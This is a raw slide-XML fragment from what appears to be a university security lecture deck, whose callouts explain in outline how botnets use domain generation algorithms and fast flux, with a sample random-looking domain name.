        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.xx8h4d9n.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Straight Connector 103"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1972476" y="4202511"/>
            <a:ext cx="4729871" cy="19152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3808534" y="4202512"/>
            <a:ext cx="2893813" cy="20106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4796425" y="4202512"/>
            <a:ext cx="1905921" cy="20106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5688907" y="4202512"/>
            <a:ext cx="1013439" cy="20106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6562621" y="4202512"/>
            <a:ext cx="139725" cy="20106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6702345" y="4202512"/>
            <a:ext cx="787026" cy="20350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6702346" y="4202511"/>
            <a:ext cx="1696333" cy="19152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6702345" y="4202512"/>
            <a:ext cx="2638378" cy="20350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6702345" y="4202511"/>
            <a:ext cx="3532394" cy="18961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2890505" y="4202512"/>
            <a:ext cx="3811841" cy="2010611"/>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23" name="Group 122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="174431" y="2086382"/>
            <a:ext cx="3262542" cy="1589090"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="124" name="Rectangular Callout 123"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181600" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 1426"/>
                <a:gd name="adj2" fmla="val 183173"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="TextBox 124"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219205" y="4928315"/>
              <a:ext cx="5181600" cy="1207113"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Bots generate many possible domains each day</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="126" name="Group 125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7663599" y="618746"/>
            <a:ext cx="3922864" cy="1033149"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="Rectangular Callout 126"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 77713"/>
                <a:gd name="adj2" fmla="val 62625"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="TextBox 127"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1318013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…But the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Botmaster</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> only needs to register a few</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="129" name="Group 128"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="9280698" y="3874644"/>
            <a:ext cx="2689836" cy="1446659"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="Rectangular Callout 129"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 133117"/>
                <a:gd name="adj2" fmla="val -48842"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="131" name="TextBox 130"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1325959"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Can be combined with fast flux</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21"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2180"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209"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238"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6267"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296"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2325"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0354"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8383"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6415"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t0ph3r\Documents\CS 4700\assets\black_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4151" y="590479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4CA7D16F-D05F-4C79-B9E8-0C86EA9DAB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8931" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F6C909-ADA2-4AEB-85C7-ABE9A5EDFC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017" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E291F6-4488-4C6C-9B5B-7028750AC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667" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Picture 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B94EA9-EA38-408A-AA01-3A15BE2020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976" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652F064C-87D8-4D1A-90C6-8466446AD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725" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B12186-0F89-4D0C-BFB9-E47F364907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7365" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D282D482-1F94-43EF-99D5-8160F62DEA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6159" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9DFB24-E4A2-4446-AD9C-C62F3CE48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774" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E43E64-E75F-4C8C-AFEA-0463EF1119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389" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1015D0EF-AE08-4D43-9284-A32435F34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0803" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28960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par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>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22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="after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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="51" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="54" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="57" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="66" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="69" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="96"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="72" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>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86"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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89"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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90"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>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92"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>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94"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>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95"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>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96"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="96"/>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97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="110" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="111" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
